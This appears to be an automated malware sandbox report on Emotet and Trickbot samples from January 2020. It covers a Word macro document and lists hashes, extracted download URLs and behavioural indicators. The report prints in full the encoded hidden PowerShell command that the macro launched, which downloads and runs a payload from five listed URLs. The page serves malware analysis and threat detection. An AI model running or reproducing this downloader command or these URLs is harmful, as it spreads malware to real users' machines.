Overview
overview
10Static
static
82020-01-14...75.zip
windows7-x64
12020-01-14...75.zip
windows10-2004-x64
1client/202...st.exe
windows7-x64
10client/202...st.exe
windows10-2004-x64
10client/202...-2.doc
windows7-x64
10client/202...-2.doc
windows10-2004-x64
10client/202...on.exe
windows7-x64
10client/202...on.exe
windows10-2004-x64
10client/202...ro.exe
windows7-x64
10client/202...ro.exe
windows10-2004-x64
10client/gpu...3C.exe
windows7-x64
10client/gpu...3C.exe
windows10-2004-x64
10client/gpu...tDll64
windows7-x64
1client/gpu...tDll64
windows10-2004-x64
1client/gpu...tDll64
windows7-x64
1client/gpu...tDll64
windows10-2004-x64
1client/gpu...s/dinj
windows7-x64
1client/gpu...s/dinj
windows10-2004-x64
1client/gpu.../dpost
windows7-x64
1client/gpu.../dpost
windows10-2004-x64
1client/gpu...s/sinj
windows7-x64
1client/gpu...s/sinj
windows10-2004-x64
1client/gpu...eDll64
windows7-x64
1client/gpu...eDll64
windows10-2004-x64
1client/gpu...mDll64
windows7-x64
1client/gpu...mDll64
windows10-2004-x64
1client/gpu...kDll64
windows7-x64
1client/gpu...kDll64
windows10-2004-x64
1client/gpu.../dpost
windows7-x64
1client/gpu.../dpost
windows10-2004-x64
1client/gpu...grab64
windows7-x64
1client/gpu...grab64
windows10-2004-x64
1Analysis
-
max time kernel
105s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
28-12-2022 03:05
Behavioral task
behavioral1
Sample
2020-01-14-malware-and-artifacts-from-Emotet-epoch-2-infection-with-Trickbot-gtag-mor75.zip
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
2020-01-14-malware-and-artifacts-from-Emotet-epoch-2-infection-with-Trickbot-gtag-mor75.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral3
Sample
client/2020-01-14-Trickbot-gtag-mor75-retrieved-by-Emotet-infected-host.exe
Resource
win7-20221111-en
Behavioral task
behavioral4
Sample
client/2020-01-14-Trickbot-gtag-mor75-retrieved-by-Emotet-infected-host.exe
Resource
win10v2004-20221111-en
Behavioral task
behavioral5
Sample
client/2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc
Resource
win7-20220812-en
Behavioral task
behavioral6
Sample
client/2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc
Resource
win10v2004-20220901-en
Behavioral task
behavioral7
Sample
client/2020-01-14-follow-up-Emotet-binary-after-initial-infection.exe
Resource
win7-20220812-en
Behavioral task
behavioral8
Sample
client/2020-01-14-follow-up-Emotet-binary-after-initial-infection.exe
Resource
win10v2004-20221111-en
Behavioral task
behavioral9
Sample
client/2020-01-14-initial-Emotet-binary-retrieved-by-Word-macro.exe
Resource
win7-20220812-en
Behavioral task
behavioral10
Sample
client/2020-01-14-initial-Emotet-binary-retrieved-by-Word-macro.exe
Resource
win10v2004-20221111-en
Behavioral task
behavioral11
Sample
client/gpuhealth/GƆCCKX ↀↂ;;;;;;;;;;;;;;;;;;;ж;;;;;;;;;;;яЫФЦйвЫФв003423C.exe
Resource
win7-20221111-en
Behavioral task
behavioral12
Sample
client/gpuhealth/GƆCCKX ↀↂ;;;;;;;;;;;;;;;;;;;ж;;;;;;;;;;;яЫФЦйвЫФв003423C.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral13
Sample
client/gpuhealth/data/importDll64
Resource
win7-20220901-en
Behavioral task
behavioral14
Sample
client/gpuhealth/data/importDll64
Resource
win10v2004-20220812-en
Behavioral task
behavioral15
Sample
client/gpuhealth/data/injectDll64
Resource
win7-20221111-en
Behavioral task
behavioral16
Sample
client/gpuhealth/data/injectDll64
Resource
win10v2004-20220812-en
Behavioral task
behavioral17
Sample
client/gpuhealth/data/injectDll64_configs/dinj
Resource
win7-20221111-en
Behavioral task
behavioral18
Sample
client/gpuhealth/data/injectDll64_configs/dinj
Resource
win10v2004-20221111-en
Behavioral task
behavioral19
Sample
client/gpuhealth/data/injectDll64_configs/dpost
Resource
win7-20220812-en
Behavioral task
behavioral20
Sample
client/gpuhealth/data/injectDll64_configs/dpost
Resource
win10v2004-20220901-en
Behavioral task
behavioral21
Sample
client/gpuhealth/data/injectDll64_configs/sinj
Resource
win7-20221111-en
Behavioral task
behavioral22
Sample
client/gpuhealth/data/injectDll64_configs/sinj
Resource
win10v2004-20221111-en
Behavioral task
behavioral23
Sample
client/gpuhealth/data/mshareDll64
Resource
win7-20221111-en
Behavioral task
behavioral24
Sample
client/gpuhealth/data/mshareDll64
Resource
win10v2004-20220812-en
Behavioral task
behavioral25
Sample
client/gpuhealth/data/mwormDll64
Resource
win7-20220812-en
Behavioral task
behavioral26
Sample
client/gpuhealth/data/mwormDll64
Resource
win10v2004-20220901-en
Behavioral task
behavioral27
Sample
client/gpuhealth/data/networkDll64
Resource
win7-20220812-en
Behavioral task
behavioral28
Sample
client/gpuhealth/data/networkDll64
Resource
win10v2004-20220812-en
Behavioral task
behavioral29
Sample
client/gpuhealth/data/networkDll64_configs/dpost
Resource
win7-20221111-en
Behavioral task
behavioral30
Sample
client/gpuhealth/data/networkDll64_configs/dpost
Resource
win10v2004-20220812-en
Behavioral task
behavioral31
Sample
client/gpuhealth/data/pwgrab64
Resource
win7-20221111-en
Behavioral task
behavioral32
Sample
client/gpuhealth/data/pwgrab64
Resource
win10v2004-20220901-en
General
-
Target
client/2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc
-
Size
248KB
-
MD5
33285762e4d622f59232275df1f8c895
-
SHA1
9453e78df31d27a75141b298f256fb26c8cd473c
-
SHA256
7a8cb80805617a8ba3c67dca2a80527c17601869e833272758ea10ef5926b29f
-
SHA512
2fa25ab449522106249c7a62581148ee9a32d5aa0c0f7dd2a2f4fa79a8b2ac529ad287be84c95e8bc5b0f266307989874bdbaf9fd2ed5cb8c509093af8040231
-
SSDEEP
6144:p0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+RC/uY+KSX:p0E3dxtR/iU9mvUPMR+KSX
Malware Config
Extracted
http://www.lakshmichowkusa.com/emailwishlist/g3B/
http://adampettycreative.com/x92k25/387wj2/
https://backerplanet.com/forum_posts/0i7/
http://hebreoenlinea-chms.mx/wp-content/sW0yhVry/
https://formaper.webinarbox.it/admin/Kb/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4940 2164 powershell.exe -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 21 4940 powershell.exe 23 4940 powershell.exe 51 4940 powershell.exe 60 4940 powershell.exe 67 4940 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1580 WINWORD.EXE 1580 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4940 powershell.exe 4940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4940 powershell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
WINWORD.EXEpid process 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\client\2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -en JABQAHQAaABrAG8AaQBsAHAAbABxAHcAPQAnAEYAdQByAHEAZwBuAHQAawBkAGIAegBqAGUAJwA7ACQARQBqAHkAaAB0AGgAZABjAHYAeAB6ACAAPQAgACcANwA5ADMAJwA7ACQASgByAHIAcABzAHAAYQBwAHkAbgBmAD0AJwBTAHQAYgBpAHcAYwBqAGwAZQBxAG0AbgBnACcAOwAkAEUAcABxAHcAagBlAHQAeABpAGMAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARQBqAHkAaAB0AGgAZABjAHYAeAB6ACsAJwAuAGUAeABlACcAOwAkAEkAYQBrAG4AcQBiAGIAeQBlAGoAZQBxAD0AJwBTAHQAaABoAGwAawBpAHgAJwA7ACQAQQB5AG8AdwBlAGYAYQBtAGsAPQAuACgAJwBuAGUAJwArACcAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQBUAC4AVwBFAEIAQwBsAGkAZQBuAHQAOwAkAFAAZgBuAHUAaABrAG8AbwB6AD0AJwBoAHQAdABwADoALwAvAHcAdwB3AC4AbABhAGsAcwBoAG0AaQBjAGgAbwB3AGsAdQBzAGEALgBjAG8AbQAvAGUAbQBhAGkAbAB3AGkAcwBoAGwAaQBzAHQALwBnADMAQgAvACoAaAB0AHQAcAA6AC8ALwBhAGQAYQBtAHAAZQB0AHQAeQBjAHIAZQBhAHQAaQB2AGUALgBjAG8AbQAvAHgAOQAyAGsAMgA1AC8AMwA4ADcAdwBqADIALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGEAYwBrAGUAcgBwAGwAYQBuAGUAdAAuAGMAbwBtAC8AZgBvAHIAdQBtAF8AcABvAHMAdABzAC8AMABpADcALwAqAGgAdAB0AHAAOgAvAC8AaABlAGIAcgBlAG8AZQBuAGwAaQBuAGUAYQAtAGMAaABtAHMALgBtAHgALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcwBXADAAeQBoAFYAcgB5AC8AKgBoAHQAdABwAHMAOgAvAC8AZgBvAHIAbQBhAHAAZQByAC4AdwBlAGIAaQBuAGEAcgBiAG8AeAAuAGkAdAAvAGEAZABtAGkAbgAvAEsAYgAvACcALgAiAHMAYABwAEwASQBUACIAKAAnACoAJwApADsAJABTAGwAYwBmAGIAZgBiAGwAZAA9ACcAWABjAHIAdgB4AHIAdQB3AHkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFIAeABoAGsAeABxAHgAYwAgAGkAbgAgACQAUABmAG4AdQBoAGsAbwBvAHoAKQB7AHQAcgB5AHsAJABBAHkAbwB3AGUAZgBhAG0AawAuACIARABPAHcAbgBgAEwATwBBAGQAZgBgAEkAYABsAGUAIgAoACQAUgB4AGgAawB4AHEAeABjACwAIAAkAEUAcABxAHcAagBlAHQAeABpAGMAbgApADsAJABQAGoAbAB3AGUAZgB2AGIAagBrAD0AJwBWAGYAeQB3AHgAegBoAHQAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABFAHAAcQB3AGoAZQB0AHgAaQBjAG4AKQAuACIAbABFAE4AZwBgAFQASAAiACAALQBnAGUAIAAyADkANwA3ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAYQBSAHQAIgAoACQARQBwAHEAdwBqAGUAdAB4AGkAYwBuACkAOwAkAFYAcgBwAGwAbwB0AG4AYQBjAHEAZgB3AD0AJwBFAGEAdwBxAGIAegB3AHkAegB3AHEAegAnADsAYgByAGUAYQBrADsAJABYAHIAeQB6AGUAbwBxAGUAbwB1AGcAaQB2AD0AJwBMAHAAagBlAGMAcwB5AGwAYwBrAGwAeAB3ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAcAB5AHAAZABrAHMAZwBzAGUAZAB6AD0AJwBKAHQAZABuAGIAbgBnAGgAJwA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1580-140-0x0000027AE3ADC000-0x0000027AE3ADE000-memory.dmpFilesize
8KB
-
memory/1580-136-0x00007FFC32230000-0x00007FFC32240000-memory.dmpFilesize
64KB
-
memory/1580-132-0x00007FFC32230000-0x00007FFC32240000-memory.dmpFilesize
64KB
-
memory/1580-135-0x00007FFC32230000-0x00007FFC32240000-memory.dmpFilesize
64KB
-
memory/1580-149-0x00007FFC32230000-0x00007FFC32240000-memory.dmpFilesize
64KB
-
memory/1580-137-0x00007FFC2FA10000-0x00007FFC2FA20000-memory.dmpFilesize
64KB
-
memory/1580-138-0x00007FFC2FA10000-0x00007FFC2FA20000-memory.dmpFilesize
64KB
-
memory/1580-147-0x00007FFC32230000-0x00007FFC32240000-memory.dmpFilesize
64KB
-
memory/1580-134-0x00007FFC32230000-0x00007FFC32240000-memory.dmpFilesize
64KB
-
memory/1580-133-0x00007FFC32230000-0x00007FFC32240000-memory.dmpFilesize
64KB
-
memory/1580-139-0x0000027AE5D80000-0x0000027AE5D84000-memory.dmpFilesize
16KB
-
memory/1580-148-0x00007FFC32230000-0x00007FFC32240000-memory.dmpFilesize
64KB
-
memory/1580-146-0x00007FFC32230000-0x00007FFC32240000-memory.dmpFilesize
64KB
-
memory/4940-144-0x00007FFC46040000-0x00007FFC46B01000-memory.dmpFilesize
10.8MB
-
memory/4940-143-0x00007FFC46040000-0x00007FFC46B01000-memory.dmpFilesize
10.8MB
-
memory/4940-142-0x00007FFC46040000-0x00007FFC46B01000-memory.dmpFilesize
10.8MB
-
memory/4940-141-0x0000023FB2FC0000-0x0000023FB2FE2000-memory.dmpFilesize
136KB